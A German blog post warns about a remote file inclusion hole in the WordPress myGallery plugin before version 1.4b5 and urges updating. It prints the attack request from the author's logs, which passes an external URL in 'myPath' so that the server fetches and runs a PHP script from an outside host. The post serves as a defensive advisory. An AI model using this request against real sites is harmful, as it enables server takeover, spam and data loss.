WordPress myGallery Plugin „myPath“ Exploid

In den letzten Tagen haben mich nicht schöne Seiten des weltweiten Internets besucht und versucht ein Plugin meines WordPress-Blogs auszunutzen, um Spammails und weitere schadhaften Servereinstellungen auszuführen.

Das Galerieplugin namens "myGallery" von wildbits hat eine große Sicherheitslücke im System.
Es lassen sich per Url über die GET-Variable "myPath" eine externe Url einbinden, diese dann ausgeführt wird.
Die externe Url benötigt nur ein Skript, welches als Text (txt)-Datei abgespeichert wird und mit "<?php" beginnt.
Schon wird die externe Datei ausgeführt und es können Spammails versendet werden und auch serverseitige Sicherheitslücken ausgenutzt werden, um den Server auszuschalten oder Daten zu löschen.

Wer "myGallery" als Plugin noch mit einer Version unter 1.4b5 verwendet, sollte schleunigst updaten,
ansonsten wird man selbst ein Opfer der Exploids / Angriffe über externe und aufgeruffene Internetadressen.

Wordpress myGallery Plugin Version 1.4b10

Wordpress myGallery Plugin Version 1.4b10

Es wird folgende Adresse versucht zu öffnen:

wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://domain.de/ordner/file.txt

Ab der myGallery-Version 1.4.b5 ist das externe Aufrufen von Skripts unterbunden worden.

Also schleunigst die "myGallery"-Plugins in euren WordPress-Blogs aktualisieren.

Ein paar Fragen und Tipps zum Thema findet ihr auch hier:

Tags: , , , , , , , , ,

Kommentare stehen nicht zur Verfügung.